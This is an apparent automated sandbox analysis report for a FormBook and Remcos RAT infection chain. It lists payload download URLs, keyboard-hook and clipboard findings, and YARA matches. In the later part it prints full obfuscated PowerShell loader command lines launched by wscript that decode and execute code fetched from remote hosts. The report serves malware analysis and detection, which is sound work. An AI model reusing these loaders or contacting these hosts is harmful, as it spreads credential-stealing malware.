            Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin
            Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
            Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: wab.exe, 00000010.00000002.2533483224.0000000002EB4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBcq
            Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: wab.exe, 00000008.00000003.2493992487.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/
            Source: wab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.bin
            Source: wab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.binLagdsWaheuroprotectie.ro/FIPWKWOaFXJGe178.bin
            Source: wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.binq(
            Source: powershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2568004154.0000021495668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://europrotectie.ro
            Source: powershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://europrotectie.ro/Methink1.thnP
            Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://europrotectie.ro/Methink1.thnXRwl
            Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2568004154.0000021494A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownHTTPS traffic detected: 188.212.111.134:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 46.254.34.12:443 -> 192.168.2.5:49713 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Installs a global keyboard hook
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041183A OpenClipboard,GetLastError,DeleteFileW,16_2_0041183A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,16_2_0040987A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004098E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_00406DFC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,19_2_00406E9F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004068B5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,20_2_004072B5

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi64_2132.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_2668.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_5804.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_6324.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6231
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6231
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 6007
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6007
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6231Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6231Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 6007Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6007Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeIJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre 